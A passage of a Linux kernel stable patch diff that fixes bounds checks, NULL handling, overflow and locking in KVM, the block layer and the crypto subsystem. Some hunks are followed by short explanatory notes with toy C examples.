+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* Pin guest memory */
+@@ -1473,7 +1473,7 @@ static int sev_receive_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	hdr = psp_copy_user_blob(params.hdr_uaddr, params.hdr_len);
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 9a194aa1a75a4..22d054ba5939a 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -4771,7 +4771,7 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.enable_nmi_window = svm_enable_nmi_window,
+ 	.enable_irq_window = svm_enable_irq_window,
+ 	.update_cr8_intercept = svm_update_cr8_intercept,
+-	.set_virtual_apic_mode = avic_set_virtual_apic_mode,
++	.set_virtual_apic_mode = avic_refresh_virtual_apic_mode,
+ 	.refresh_apicv_exec_ctrl = avic_refresh_apicv_exec_ctrl,
+ 	.check_apicv_inhibit_reasons = avic_check_apicv_inhibit_reasons,
+ 	.apicv_post_state_restore = avic_apicv_post_state_restore,
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index 4826e6cc611bf..d0ed3f5952295 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -648,7 +648,7 @@ void avic_vcpu_blocking(struct kvm_vcpu *vcpu);
+ void avic_vcpu_unblocking(struct kvm_vcpu *vcpu);
+ void avic_ring_doorbell(struct kvm_vcpu *vcpu);
+ unsigned long avic_vcpu_get_apicv_inhibit_reasons(struct kvm_vcpu *vcpu);
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu);
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu);
+ 
+ 
+ /* sev.c */
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index 45faf84476cec..65c355b4b8bf0 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -30,7 +30,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ 		hve->hv_enlightenments_control.msr_bitmap = 1;
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ 	if (npt_enabled &&
+ 	    ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB) {
+@@ -84,7 +84,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ }
+ 
+diff --git a/arch/x86/kvm/vmx/hyperv.h b/arch/x86/kvm/vmx/hyperv.h
+index 571e7929d14e7..9dee71441b594 100644
+--- a/arch/x86/kvm/vmx/hyperv.h
++++ b/arch/x86/kvm/vmx/hyperv.h
+@@ -190,16 +190,6 @@ static inline u16 evmcs_read16(unsigned long field)
+ 	return *(u16 *)((char *)current_evmcs + offset);
+ }
+ 
+-static inline void evmcs_touch_msr_bitmap(void)
+-{
+-	if (unlikely(!current_evmcs))
+-		return;
+-
+-	if (current_evmcs->hv_enlightenments_control.msr_bitmap)
+-		current_evmcs->hv_clean_fields &=
+-			~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
+-}
+-
+ static inline void evmcs_load(u64 phys_addr)
+ {
+ 	struct hv_vp_assist_page *vp_ap =
+@@ -219,7 +209,6 @@ static inline u64 evmcs_read64(unsigned long field) { return 0; }
+ static inline u32 evmcs_read32(unsigned long field) { return 0; }
+ static inline u16 evmcs_read16(unsigned long field) { return 0; }
+ static inline void evmcs_load(u64 phys_addr) {}
+-static inline void evmcs_touch_msr_bitmap(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ #define EVMPTR_INVALID (-1ULL)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 7eec0226d56a2..939e395cda3ff 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -3865,8 +3865,13 @@ static void vmx_msr_bitmap_l01_changed(struct vcpu_vmx *vmx)
+ 	 * 'Enlightened MSR Bitmap' feature L0 needs to know that MSR
+ 	 * bitmap has changed.
+ 	 */
+-	if (static_branch_unlikely(&enable_evmcs))
+-		evmcs_touch_msr_bitmap();
++	if (IS_ENABLED(CONFIG_HYPERV) && static_branch_unlikely(&enable_evmcs)) {
++		struct hv_enlightened_vmcs *evmcs = (void *)vmx->vmcs01.vmcs;
++
++		if (evmcs->hv_enlightenments_control.msr_bitmap)
++			evmcs->hv_clean_fields &=
++				~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
++	}
+ 
+ 	vmx->nested.force_msr_bitmap_recalc = true;
+ }
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 3f5685c00e360..91ffee6fc8cb4 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -418,6 +418,7 @@ int bio_integrity_clone(struct bio *bio, struct bio *bio_src,
+ 
+ 	bip->bip_vcnt = bip_src->bip_vcnt;
+ 	bip->bip_iter = bip_src->bip_iter;
++	bip->bip_flags = bip_src->bip_flags & ~BIP_BLOCK_INTEGRITY;
+ 
+ 	return 0;
+ }
+diff --git a/block/bio.c b/block/bio.c
+index ab59a491a883e..4e7d11672306b 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -773,6 +773,7 @@ static inline void bio_put_percpu_cache(struct bio *bio)
+ 
+ 	if ((bio->bi_opf & REQ_POLLED) && !WARN_ON_ONCE(in_interrupt())) {
+ 		bio->bi_next = cache->free_list;
++		bio->bi_bdev = NULL;
+ 		cache->free_list = bio;
+ 		cache->nr++;
+ 	} else {
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 9ac1efb053e08..45881f8c79130 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -118,14 +118,32 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
++	struct request_queue *q = blkg->q;
+ 	int i;
+ 
++	/*
++	 * pd_free_fn() can also be called from blkcg_deactivate_policy().
++	 * To make sure pd_free_fn() is called in order, the removal of
++	 * blkg->q_node from the list is delayed from blkg_destroy() to
++	 * here, and blkcg_mutex is used to synchronize blkg_free_workfn()
++	 * and blkcg_deactivate_policy().
++	 */
++	if (q)
++		mutex_lock(&q->blkcg_mutex);
++
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->q)
+-		blk_put_queue(blkg->q);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
++
++	if (q) {
++		list_del_init(&blkg->q_node);
++		mutex_unlock(&q->blkcg_mutex);
++		blk_put_queue(q);
++	}
++
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -158,8 +176,6 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -458,9 +474,14 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/* Something wrong if we are trying to remove same group twice */
+-	WARN_ON_ONCE(list_empty(&blkg->q_node));
+-	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
++	/*
++	 * blkg stays on the queue list until blkg_free_workfn(), see details in
++	 * blkg_free_workfn(), hence this function can be called from
++	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
++	 * blkg_free_workfn().
++	 */
++	if (hlist_unhashed(&blkg->blkcg_node))
++		return;
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -472,7 +493,6 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
+-	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1273,6 +1293,7 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
++	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1510,6 +1531,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
++	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1528,6 +1550,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
++	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/block/blk-core.c b/block/blk-core.c
+index b5098355d8b27..5a0049215ee72 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -684,6 +684,18 @@ static void __submit_bio_noacct_mq(struct bio *bio)
+ 
+ void submit_bio_noacct_nocheck(struct bio *bio)
+ {
++	blk_cgroup_bio_start(bio);
++	blkcg_bio_issue_init(bio);
++
++	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
++		trace_block_bio_queue(bio);
++		/*
++		 * Now that enqueuing has been traced, we need to trace
++		 * completion as well.
++		 */
++		bio_set_flag(bio, BIO_TRACE_COMPLETION);
++	}
++
+ 	/*
+ 	 * We only want one ->submit_bio to be active at a time, else stack
+ 	 * usage with stacked devices could be a problem.  Use current->bio_list
+@@ -788,17 +800,6 @@ void submit_bio_noacct(struct bio *bio)
+ 
+ 	if (blk_throtl_bio(bio))
+ 		return;
+-
+-	blk_cgroup_bio_start(bio);
+-	blkcg_bio_issue_init(bio);
+-
+-	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
+-		trace_block_bio_queue(bio);
+-		/* Now that enqueuing has been traced, we need to trace
+-		 * completion as well.
+-		 */
+-		bio_set_flag(bio, BIO_TRACE_COMPLETION);
+-	}
+ 	submit_bio_noacct_nocheck(bio);
+ 	return;
+ 
+@@ -853,10 +854,16 @@ EXPORT_SYMBOL(submit_bio);
+  */
+ int bio_poll(struct bio *bio, struct io_comp_batch *iob, unsigned int flags)
+ {
+-	struct request_queue *q = bdev_get_queue(bio->bi_bdev);
+ 	blk_qc_t cookie = READ_ONCE(bio->bi_cookie);
++	struct block_device *bdev;
++	struct request_queue *q;
+ 	int ret = 0;
+ 
++	bdev = READ_ONCE(bio->bi_bdev);
++	if (!bdev)
++		return 0;
++
++	q = bdev_get_queue(bdev);
+ 	if (cookie == BLK_QC_T_NONE ||
+ 	    !test_bit(QUEUE_FLAG_POLL, &q->queue_flags))
+ 		return 0;
+@@ -916,7 +923,7 @@ int iocb_bio_iopoll(struct kiocb *kiocb, struct io_comp_batch *iob,
+ 	 */
+ 	rcu_read_lock();
+ 	bio = READ_ONCE(kiocb->private);
+-	if (bio && bio->bi_bdev)
++	if (bio)
+ 		ret = bio_poll(bio, iob, flags);
+ 	rcu_read_unlock();
+ 
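The reordering above exists because bio->bi_bdev can be cleared by a
concurrent free path (see the bio_put_percpu_cache hunk earlier), so the
pointer has to be loaded once and validated before the queue is derived
from it. A toy model of that load-once shape (plain C stand-in; the
kernel uses READ_ONCE() for the actual load):

#include <stdio.h>

struct queue { const char *name; };
struct bio_like { struct queue *q; };

static int poll_one(struct bio_like *bio)
{
	struct queue *q = bio->q;	/* load once into a local */

	if (!q)				/* already recycled: nothing to poll */
		return 0;

	printf("polling %s\n", q->name);	/* use only the local copy */
	return 1;
}

int main(void)
{
	struct queue q = { "nvme0n1" };
	struct bio_like bio = { &q };

	poll_one(&bio);
	bio.q = NULL;
	poll_one(&bio);
	return 0;
}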
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 6955605629e4f..ec7219caea165 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -866,9 +866,14 @@ static void calc_lcoefs(u64 bps, u64 seqiops, u64 randiops,
+ 
+ 	*page = *seqio = *randio = 0;
+ 
+-	if (bps)
+-		*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC,
+-					   DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE));
++	if (bps) {
++		u64 bps_pages = DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE);
++
++		if (bps_pages)
++			*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC, bps_pages);
++		else
++			*page = 1;
++	}
+ 
+ 	if (seqiops) {
+ 		v = DIV64_U64_ROUND_UP(VTIME_PER_SEC, seqiops);
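With nonzero bps, the inner round-up can only yield zero when bps is so
large that adding IOC_PAGE_SIZE - 1 wraps the 64-bit sum; the new guard
then substitutes 1 instead of dividing by zero. A standalone sketch of
the wrap (constants illustrative):

#include <stdint.h>
#include <stdio.h>

#define IOC_PAGE_SIZE 4096ull

/* Classic round-up: n + d - 1 overflows for n close to UINT64_MAX. */
static uint64_t div_round_up(uint64_t n, uint64_t d)
{
	return (n + d - 1) / d;
}

int main(void)
{
	uint64_t bps = UINT64_MAX;	/* user-supplied model parameter */
	uint64_t pages = div_round_up(bps, IOC_PAGE_SIZE);

	/* pages is 0 here because bps + 4095 wrapped around; dividing
	 * VTIME_PER_SEC by it would fault, hence the guard above. */
	printf("pages = %llu\n", (unsigned long long)pages);
	return 0;
}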
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index b7c193d67185d..808b58129d3e4 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -757,6 +757,33 @@ void blk_rq_set_mixed_merge(struct request *rq)
+ 	rq->rq_flags |= RQF_MIXED_MERGE;
+ }
+ 
++static inline blk_opf_t bio_failfast(const struct bio *bio)
++{
++	if (bio->bi_opf & REQ_RAHEAD)
++		return REQ_FAILFAST_MASK;
++
++	return bio->bi_opf & REQ_FAILFAST_MASK;
++}
++
++/*
++ * After we are marked as MIXED_MERGE, any new RA bio has to be updated
++ * as failfast, and request's failfast has to be updated in case of
++ * front merge.
++ */
++static inline void blk_update_mixed_merge(struct request *req,
++		struct bio *bio, bool front_merge)
++{
++	if (req->rq_flags & RQF_MIXED_MERGE) {
++		if (bio->bi_opf & REQ_RAHEAD)
++			bio->bi_opf |= REQ_FAILFAST_MASK;
++
++		if (front_merge) {
++			req->cmd_flags &= ~REQ_FAILFAST_MASK;
++			req->cmd_flags |= bio->bi_opf & REQ_FAILFAST_MASK;
++		}
++	}
++}
++
+ static void blk_account_io_merge_request(struct request *req)
+ {
+ 	if (blk_do_io_stat(req)) {
+@@ -954,7 +981,7 @@ enum bio_merge_status {
+ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_back_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -965,6 +992,8 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, false);
++
+ 	req->biotail->bi_next = bio;
+ 	req->biotail = bio;
+ 	req->__data_len += bio->bi_iter.bi_size;
+@@ -978,7 +1007,7 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_front_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -989,6 +1018,8 @@ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, true);
++
+ 	bio->bi_next = req->bio;
+ 	req->bio = bio;
+ 
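The helper added above treats any readahead bio as fully failfast so that
merge decisions stay consistent for RA I/O. A toy of just the flag
arithmetic (bit values invented for the sketch, not the kernel's):

#include <stdio.h>

#define REQ_RAHEAD	  (1u << 0)
#define REQ_FAILFAST_MASK (1u << 1)	/* toy: one failfast bit */

static unsigned int bio_failfast(unsigned int bi_opf)
{
	if (bi_opf & REQ_RAHEAD)	/* RA bios count as failfast */
		return REQ_FAILFAST_MASK;

	return bi_opf & REQ_FAILFAST_MASK;
}

int main(void)
{
	printf("RA bio    -> 0x%x\n", bio_failfast(REQ_RAHEAD));
	printf("plain bio -> 0x%x\n", bio_failfast(0));
	return 0;
}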
+diff --git a/block/blk-mq-sched.c b/block/blk-mq-sched.c
+index 23d1a90fec427..06b312c691143 100644
+--- a/block/blk-mq-sched.c
++++ b/block/blk-mq-sched.c
+@@ -19,8 +19,7 @@
+ #include "blk-wbt.h"
+ 
+ /*
+- * Mark a hardware queue as needing a restart. For shared queues, maintain
+- * a count of how many hardware queues are marked for restart.
++ * Mark a hardware queue as needing a restart.
+  */
+ void blk_mq_sched_mark_restart_hctx(struct blk_mq_hw_ctx *hctx)
+ {
+@@ -82,7 +81,7 @@ dispatch:
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+@@ -210,7 +209,7 @@ static struct blk_mq_ctx *blk_mq_next_ctx(struct blk_mq_hw_ctx *hctx,
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 9c8dc70020bc9..b9e3b558367f1 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -658,7 +658,8 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ 	 * allocator for this for the rare use case of a command tied to
+ 	 * a specific queue.
+ 	 */
+-	if (WARN_ON_ONCE(!(flags & (BLK_MQ_REQ_NOWAIT | BLK_MQ_REQ_RESERVED))))
++	if (WARN_ON_ONCE(!(flags & BLK_MQ_REQ_NOWAIT)) ||
++	    WARN_ON_ONCE(!(flags & BLK_MQ_REQ_RESERVED)))
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	if (hctx_idx >= q->nr_hw_queues)
+@@ -1825,12 +1826,13 @@ static int blk_mq_dispatch_wake(wait_queue_entry_t *wait, unsigned mode,
+ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 				 struct request *rq)
+ {
+-	struct sbitmap_queue *sbq = &hctx->tags->bitmap_tags;
++	struct sbitmap_queue *sbq;
+ 	struct wait_queue_head *wq;
+ 	wait_queue_entry_t *wait;
+ 	bool ret;
+ 
+-	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED)) {
++	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) &&
++	    !(blk_mq_is_shared_tags(hctx->flags))) {
+ 		blk_mq_sched_mark_restart_hctx(hctx);
+ 
+ 		/*
+@@ -1848,6 +1850,10 @@ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 	if (!list_empty_careful(&wait->entry))
+ 		return false;
+ 
++	if (blk_mq_tag_is_reserved(rq->mq_hctx->sched_tags, rq->internal_tag))
++		sbq = &hctx->tags->breserved_tags;
++	else
++		sbq = &hctx->tags->bitmap_tags;
+ 	wq = &bt_wait_ptr(sbq, hctx)->wait;
+ 
+ 	spin_lock_irq(&wq->lock);
+@@ -2096,7 +2102,8 @@ out:
+ 		bool needs_restart;
+ 		/* For non-shared tags, the RESTART check will suffice */
+ 		bool no_tag = prep == PREP_DISPATCH_NO_TAG &&
+-			(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED);
++			((hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) ||
++			blk_mq_is_shared_tags(hctx->flags));
+ 
+ 		if (nr_budgets)
+ 			blk_mq_release_budgets(q, list);
+diff --git a/block/fops.c b/block/fops.c
+index 50d245e8c913a..d2e6be4e3d1c7 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -221,6 +221,24 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 			bio_endio(bio);
+ 			break;
+ 		}
++		if (iocb->ki_flags & IOCB_NOWAIT) {
++			/*
++			 * This is nonblocking IO, and we need to allocate
++			 * another bio if we have data left to map. As we
++			 * cannot guarantee that one of the sub bios will not
++			 * fail getting issued for NOWAIT, and since error
++			 * results are coalesced across all of them, be safe
++			 * and ask for a retry of this from blocking context.
++			 */
++			if (unlikely(iov_iter_count(iter))) {
++				bio_release_pages(bio, false);
++				bio_clear_flag(bio, BIO_REFFED);
++				bio_put(bio);
++				blk_finish_plug(&plug);
++				return -EAGAIN;
++			}
++			bio->bi_opf |= REQ_NOWAIT;
++		}
+ 
+ 		if (is_read) {
+ 			if (dio->flags & DIO_SHOULD_DIRTY)
+@@ -228,9 +246,6 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 		} else {
+ 			task_io_account_write(bio->bi_iter.bi_size);
+ 		}
+-		if (iocb->ki_flags & IOCB_NOWAIT)
+-			bio->bi_opf |= REQ_NOWAIT;
+-
+ 		dio->size += bio->bi_iter.bi_size;
+ 		pos += bio->bi_iter.bi_size;
+ 
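The hunk moves the NOWAIT handling ahead of submission and adds the
multi-bio bail-out: once a nonblocking request would need a second bio,
any later failure could not be attributed after errors are coalesced, so
the whole request is bounced back for a blocking retry. A toy model of
that decision (sizes and names invented for the sketch):

#include <errno.h>
#include <stdio.h>

#define CHUNK 4096u	/* stand-in for one bio's capacity */

static long submit_nonblocking(unsigned long total)
{
	unsigned long issued = total < CHUNK ? total : CHUNK;

	if (total - issued)	/* data left: would need another bio */
		return -EAGAIN;	/* retry from blocking context instead */

	return (long)issued;
}

int main(void)
{
	printf("%ld\n", submit_nonblocking(1024));	/* fits: 1024 */
	printf("%ld\n", submit_nonblocking(65536));	/* -EAGAIN */
	return 0;
}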
+diff --git a/crypto/asymmetric_keys/public_key.c b/crypto/asymmetric_keys/public_key.c
+index 2f8352e888602..eca5671ad3f22 100644
+--- a/crypto/asymmetric_keys/public_key.c
++++ b/crypto/asymmetric_keys/public_key.c
+@@ -186,8 +186,28 @@ static int software_key_query(const struct kernel_pkey_params *params,
+ 
+ 	len = crypto_akcipher_maxsize(tfm);
+ 	info->key_size = len * 8;
+-	info->max_data_size = len;
+-	info->max_sig_size = len;
++
++	if (strncmp(pkey->pkey_algo, "ecdsa", 5) == 0) {
++		/*
++		 * ECDSA key sizes are much smaller than RSA, and thus could
++		 * operate on (hashed) inputs that are larger than key size.
++		 * For example SHA384-hashed input used with secp256r1
++		 * based keys.  Set max_data_size to be at least as large as
++		 * the largest supported hash size (SHA512)
++		 */
++		info->max_data_size = 64;
++
++		/*
++		 * Verify takes ECDSA-Sig (described in RFC 5480) as input,
++		 * which is actually 2 'key_size'-bit integers encoded in
++		 * ASN.1.  Account for the ASN.1 encoding overhead here.
++		 */
++		info->max_sig_size = 2 * (len + 3) + 2;
++	} else {
++		info->max_data_size = len;
++		info->max_sig_size = len;
++	}
++
+ 	info->max_enc_size = len;
+ 	info->max_dec_size = len;
+ 	info->supported_ops = (KEYCTL_SUPPORTS_ENCRYPT |
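Worked numbers for the max_sig_size formula above: an ECDSA-Sig is a DER
SEQUENCE of two INTEGERs, each needing a 2-byte header plus a possible
leading zero byte on top of the len key bytes, and the SEQUENCE adds its
own 2-byte header. A standalone check of the arithmetic:

#include <stdio.h>

static unsigned int max_sig_size(unsigned int len /* key bytes */)
{
	/* 2 * (INTEGER header + leading zero + len) + SEQUENCE header */
	return 2 * (len + 3) + 2;
}

int main(void)
{
	printf("secp256r1 (len 32): %u bytes\n", max_sig_size(32)); /* 72 */
	printf("secp384r1 (len 48): %u bytes\n", max_sig_size(48)); /* 104 */
	return 0;
}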
+diff --git a/crypto/essiv.c b/crypto/essiv.c
+index e33369df90344..307eba74b901e 100644
+--- a/crypto/essiv.c
++++ b/crypto/essiv.c
+@@ -171,7 +171,12 @@ static void essiv_aead_done(struct crypto_async_request *areq, int err)
+ 	struct aead_request *req = areq->data;
+ 	struct essiv_aead_request_ctx *rctx = aead_request_ctx(req);
+ 
++	if (err == -EINPROGRESS)
++		goto out;
++
+ 	kfree(rctx->assoc);
++
++out:
+ 	aead_request_complete(req, err);
+ }
+ 
+@@ -247,7 +252,7 @@ static int essiv_aead_crypt(struct aead_request *req, bool enc)
+ 	err = enc ? crypto_aead_encrypt(subreq) :
+ 		    crypto_aead_decrypt(subreq);
+ 
+-	if (rctx->assoc && err != -EINPROGRESS)
++	if (rctx->assoc && err != -EINPROGRESS && err != -EBUSY)
+ 		kfree(rctx->assoc);
+ 	return err;
+ }
+diff --git a/crypto/rsa-pkcs1pad.c b/crypto/rsa-pkcs1pad.c
+index 6ee5b8a060c06..4e9d2244ee317 100644
+--- a/crypto/rsa-pkcs1pad.c
++++ b/crypto/rsa-pkcs1pad.c
+@@ -214,16 +214,14 @@ static void pkcs1pad_encrypt_sign_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_encrypt_sign_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req,
+-			pkcs1pad_encrypt_sign_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_encrypt(struct akcipher_request *req)
+@@ -332,15 +330,14 @@ static void pkcs1pad_decrypt_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_decrypt_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_decrypt_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_decrypt(struct akcipher_request *req)
+@@ -513,15 +510,14 @@ static void pkcs1pad_verify_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_verify_complete(req, err));
++	err = pkcs1pad_verify_complete(req, err);
++
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ /*
+diff --git a/crypto/seqiv.c b/crypto/seqiv.c
+index 0899d527c2845..b1bcfe537daf1 100644
+--- a/crypto/seqiv.c
++++ b/crypto/seqiv.c
+@@ -23,7 +23,7 @@ static void seqiv_aead_encrypt_complete2(struct aead_request *req, int err)
+ 	struct aead_request *subreq = aead_request_ctx(req);
+ 	struct crypto_aead *geniv;
+ 
+-	if (err == -EINPROGRESS)
++	if (err == -EINPROGRESS || err == -EBUSY)
+ 		return;
+ 
+ 	if (err)
+diff --git a/crypto/xts.c b/crypto/xts.c
+index 63c85b9e64e08..de6cbcf69bbd6 100644
+--- a/crypto/xts.c
++++ b/crypto/xts.c
+@@ -203,12 +203,12 @@ static void xts_encrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
